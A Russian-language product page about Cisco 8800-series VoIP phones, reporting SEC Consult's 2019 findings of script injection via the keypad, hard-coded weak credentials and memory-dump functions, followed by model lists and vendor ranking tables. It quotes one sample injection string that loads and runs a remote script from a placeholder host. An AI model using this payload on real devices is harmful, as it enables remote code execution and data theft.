Логотип
Баннер в шапке 1
Баннер в шапке 2

Cisco 8800-серия IP-телефонов

Продукт
Разработчики: Cisco Systems
Технологии: IP-телефония,  Офисная техника

Содержание

[Свернуть]

Серия 8800 включает модели корпоративных VoIP-телефонов Cisco.

2019

Уязвимость в VoIP-телефонах Cisco серии 8800, позволяющая красть данные

Компания SEC Consult 9 января 2019 года сообщила о том, что выявила целый ряд проблем в программных оболочках популярных систем интернет-телефонии Cisco VoIP Phone 8800.

Как отмечается, одна из ключевых проблем заключается в возможности инъекции JavaScript-подобного кода с помощью встроенной клавиатуры T9. Иными словами, злоумышленник может использовать встроенную цифро-буквенную клавиатуру VoIP-телефона для ввода вредоносного кода.

Например, имя хоста телефона можно подменить на код примерно такого содержания:

hostname`><img src=http://$IP/sec.js onload=exec()>,

И он добросовестно скачает посторонний файл (sec.js) с удаленного источника и запустит его.

Помимо этого, в программной оболочке телефонов содержатся многочисленные устаревшие — и, следовательно, небезопасные — библиотеки кода, а также жестко закодированные реквизиты доступа. Они хранятся в виде хэшей в файле с красноречивым названием /etc/passwd; хэширование произведено с помощью устаревшего алгоритма UNIX MD5+salt, вдобавок, как оказалось, сами пароли очень слабые, так что вскрыть их и получить доступ к устройству через SSH оказалось весьма тривиальной задачей.

Обнаружить уязвимости удалось с помощью собственной платформы SEC Consult — IoT Inspector, предназначенной для поиска проблем в программных оболочках устройствах интернета вещей. Объем российского рынка платформ контейнеризации и его лидеры. Исследование TAdviser 6.6 т

Был также произведен ручной анализ, позволивший выявить в «прошивке» телефонов незадокументированные, но легко эксплуатируемые функции, позволяющие потенциальному злоумышленнику выводить дампы памяти и, соответственно, красть данные.

«
Проблему нельзя назвать рядовой, — считает Олег Галушкин, директор по безопасности компании SEC Consult Services, российского представительства SEC Consult. — VoIP-телефоны Cisco серии 8800 активно используются по всему миру в госсекторе и в крупном бизнесе — это касается и России, где данные устройства популярны в крупнейших корпорациях. Подобные уязвимости представляют стратегическую угрозу для бизнеса уже потому, что их очень легко эксплуатировать; похищение критически важных данных в подобных случаях также оказывается «общим местом».
»

Описанные уязвимости выявлены в программной оболочке Cisco IP Phone 88xx версии 2-0-1 ES-15 (ID: f86aa7612d9311e6).[1] По сведениям, предоставленных самой корпорацией Cisco, уязвимости затрагивают следующие модели:

  • IP Conference Phone 8832
  • IP Phone 8811
  • IP Phone 8841
  • IP Phone 8845
  • IP Phone 8851
  • IP Phone 8861
  • IP Phone 8865
  • Unified IP Conference Phone 8831
  • Wireless IP Phone 8821
  • Wireless IP Phone 8821-EX

По информации SEC Consult, вендор уже внес необходимые исправления.

Модельный ряд серии 8800

На январь 2019 года модельный ряд VoIP-телефонов Cisco серии 8800 включает:

  • Cisco IP Conference Phone 8832
  • Cisco IP Phone 8865 Key Expansion Module
  • Cisco IP Phone 8865
  • Cisco IP Phone 8861
  • Cisco IP Phone 8851
  • Cisco IP Phone 8851/8861 Key Expansion Module
  • Cisco IP Phone 8845
  • Cisco IP Phone 8841
  • Cisco IP Phone 8811
  • Cisco IP Phone 8800 Key Expansion Module
  • Cisco Unified IP Conference Phone 8831
  • Cisco Wireless IP Phone 8821
  • Cisco Wireless IP Phone 8821-EX



СМ. ТАКЖЕ (1)


Подрядчики-лидеры по количеству проектов

За всю историю
2022 год
2023 год
2024 год
Текущий год

  Naumen (Наумен консалтинг) (197)
  ИнтелТелеком (Инфинити Трейд) (109)
  МайАстериск (myAsterisk) (104)
  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (54)
  ЛайфТелеком (Телфин) (30)
  Другие (724)

  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (9)
  Naumen (Наумен консалтинг) (8)
  ЛайфТелеком (Телфин) (8)
  ИнтелТелеком (Инфинити Трейд) (3)
  САТЕЛ (3)
  Другие (15)

  Mango Office (Манго Телеком) (6)
  ЛайфТелеком (Телфин) (5)
  Naumen (Наумен консалтинг) (4)
  Группа компаний ЦРТ (Центр речевых технологий) (4)
  ИнтелТелеком (Инфинити Трейд) (2)
  Другие (9)

  Mango Office (Манго Телеком) (5)
  ЛайфТелеком (Телфин) (5)
  Naumen (Наумен консалтинг) (4)
  ИнтелТелеком (Инфинити Трейд) (4)
  Нота (Холдинг Т1) (2)
  Другие (18)

  ЛайфТелеком (Телфин) (6)
  Нота (Холдинг Т1) (3)
  Envybox (Энвибокс) (1)
  Lad, Лад Ай Ти (ранее ГК Лад, Лад-Проект) (1)
  Naumen (Наумен консалтинг) (1)
  Другие (5)

Распределение вендоров по количеству проектов внедрений (систем, проектов) с учётом партнёров

За всю историю
2022 год
2023 год
2024 год
Текущий год

  Naumen (Наумен консалтинг) (2, 211)
  ИнтелТелеком (Инфинити Трейд) (1, 137)
  МайАстериск (myAsterisk) (1, 107)
  Avaya (25, 77)
  Microsoft (7, 70)
  Другие (442, 568)

  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (1, 9)
  ЛайфТелеком (Телфин) (2, 8)
  Naumen (Наумен консалтинг) (1, 8)
  Сател Про (1, 3)
  ИнтелТелеком (Инфинити Трейд) (1, 3)
  Другие (12, 16)

  Mango Office (Манго Телеком) (2, 6)
  ЛайфТелеком (Телфин) (1, 5)
  Группа компаний ЦРТ (Центр речевых технологий) (1, 4)
  Naumen (Наумен консалтинг) (1, 4)
  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (1, 2)
  Другие (9, 10)

  Mango Office (Манго Телеком) (2, 5)
  Naumen (Наумен консалтинг) (1, 5)
  ЛайфТелеком (Телфин) (1, 5)
  ИнтелТелеком (Инфинити Трейд) (1, 4)
  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (1, 3)
  Другие (11, 15)

  ЛайфТелеком (Телфин) (2, 6)
  Нота (Холдинг Т1) (1, 4)
  Р7-Офис (ранее Новые Коммуникационные Технологии, НКТ) (1, 2)
  Авантелеком (1, 1)
  Naumen (Наумен консалтинг) (1, 1)
  Другие (1, 1)

Распределение систем по количеству проектов, не включая партнерские решения

За всю историю
2022 год
2023 год
2024 год
Текущий год

  Naumen Contact Center (ранее IP call-центр Naumen Phone) - 211
  Call Center Infinity - 137
  CallBox Contact-center - 107
  Р7-Офис - 69
  Skype for Business (ранее Microsoft Lync) - 67
  Другие 542

  Р7-Офис - 9
  Naumen Contact Center (ранее IP call-центр Naumen Phone) - 8
  Телфин.Офис Виртуальная АТС - 7
  Call Center Infinity - 3
  Сател Российский телефонный узел (РТУ) VoIP Платформа - 3
  Другие 14

  Телфин.Офис Виртуальная АТС - 5
  Mango Office Виртуальная АТС ВАТС - 5
  SmartLogger II - 4
  Naumen Contact Center (ранее IP call-центр Naumen Phone) - 4
  Mango Office Контакт-центр - 3
  Другие 10

  Naumen Contact Center (ранее IP call-центр Naumen Phone) - 5
  Телфин.Офис Виртуальная АТС - 5
  Call Center Infinity - 4
  Mango Office Виртуальная АТС ВАТС - 4
  Р7-Офис - 3
  Другие 17

  Телфин.Офис Виртуальная АТС - 6
  Нота: Dion Платформа корпоративных коммуникаций - 4
  Р7-Офис - 2
  Call Center Infinity - 1
  Авантелеком: АТС - 1
  Другие 2

Подрядчики-лидеры по количеству проектов

За всю историю
2022 год
2023 год
2024 год
Текущий год

  ЭЛАР (Электронный архив, НПО Опыт) (178)
  Konica Minolta Business Solutions Russia (Коника Минолта Бизнес Сольюшнз Раша) (40)
  Техноэволаб (ранее Xerox СНГ) (40)
  X-Com (Икс ком) (39)
  Кортис (36)
  Другие (369)

  ЭЛАР (Электронный архив, НПО Опыт) (16)
  Кортис (8)
  X-Com (Икс ком) (6)
  Softline (Софтлайн) (4)
  Crystal Service Integration (CSI, Кристалл Сервис Интеграция) (4)
  Другие (27)

  ЭЛАР (Электронный архив, НПО Опыт) (24)
  Softline (Софтлайн) (3)
  X-Com (Икс ком) (3)
  Сканпорт АйДи (Scanport) (3)
  Crystal Service Integration (CSI, Кристалл Сервис Интеграция) (3)
  Другие (13)

  ЭЛАР (Электронный архив, НПО Опыт) (25)
  Softline (Софтлайн) (5)
  Гравитон (Ревотех, Революционные технологии) (5)
  R-Style Softlab (Эр-Стайл Софтлаб) (5)
  X-Com (Икс ком) (3)
  Другие (20)

  ЭЛАР (Электронный архив, НПО Опыт) (9)
  Рикор.ИТ (3)
  КНС Групп (Yadro) (2)
  Сканпорт АйДи (Scanport) (2)
  Softline (Софтлайн) (2)
  Другие (8)

Распределение вендоров по количеству проектов внедрений (систем, проектов) с учётом партнёров

За всю историю
2022 год
2023 год
2024 год
Текущий год

  ЭЛАР (Электронный архив, НПО Опыт) (1, 185)
  ПроСофт-ПК (1, 185)
  Xerox (33, 108)
  Konica Minolta (Коника Минолта) (13, 48)
  Lenovo (22, 27)
  Другие (962, 279)

  ПроСофт-ПК (1, 17)
  ЭЛАР (Электронный архив, НПО Опыт) (1, 17)
  Pantum (3, 5)
  Crystal Service Integration (CSI, Кристалл Сервис Интеграция) (2, 4)
  Lenovo (4, 3)
  Другие (23, 25)

  ПроСофт-ПК (1, 24)
  ЭЛАР (Электронный архив, НПО Опыт) (1, 24)
  Crystal Service Integration (CSI, Кристалл Сервис Интеграция) (4, 4)
  АТОЛ (3, 3)
  Urovo Technology (Урово) (2, 3)
  Другие (14, 11)

  ЭЛАР (Электронный архив, НПО Опыт) (1, 25)
  ПроСофт-ПК (1, 25)
  Гравитон (Ревотех, Революционные технологии) (3, 5)
  3Logic Group (Новый Ай Ти Проект) (2, 5)
  АТОЛ (3, 4)
  Другие (10, 11)

  ПроСофт-ПК (1, 9)
  ЭЛАР (Электронный архив, НПО Опыт) (1, 9)
  АТОЛ (2, 3)
  Рикор Электроникс (Ricor Electronics) (2, 3)
  Сомерс (1, 1)
  Другие (4, 4)

Распределение систем по количеству проектов, не включая партнерские решения

За всю историю
2022 год
2023 год
2024 год
Текущий год

  ЭларСКАН - 185
  Xerox Versant Полноцветные ЦПМ - 51
  Konica Minolta AccurioPress C-серия - 24
  YSoft SafeQ - 17
  Pantum M-серия МФУ - 17
  Другие 373

  ЭларСКАН - 17
  CSI K Касса самообслуживания - 3
  Pantum BM-серия МФУ - 3
  HP EliteDesk Десктопы и моноблоки - 2
  Ramec Tsunami Персональные компьютеры - 2
  Другие 27

  ЭларСКАН - 24
  CSI K Касса самообслуживания - 3
  Urovo DT-серия Терминалы сбора данных - 2
  HP Color LaserJet Pro M-серия принтеров - 1
  CSI Pirit (Пирит) - 1
  Другие 15

  ЭларСКАН - 25
  3Logic Group: Гравитон М-серия Моноблоки - 5
  3Logic Group: Гравитон Н-серия Ноутбуки - 5
  3Logic Group: Гравитон Д-серия Персональные компьютеры - 5
  АТОЛ Онлайн-кассы - 2
  Другие 13

  ЭларСКАН - 9
  АТОЛ Smart Терминалы сбора данных - 2
  Рикор Ноутбуки - 2
  Инферит Ноутбуки - 1
  Rikor USFF мини-ПК - 1
  Другие 4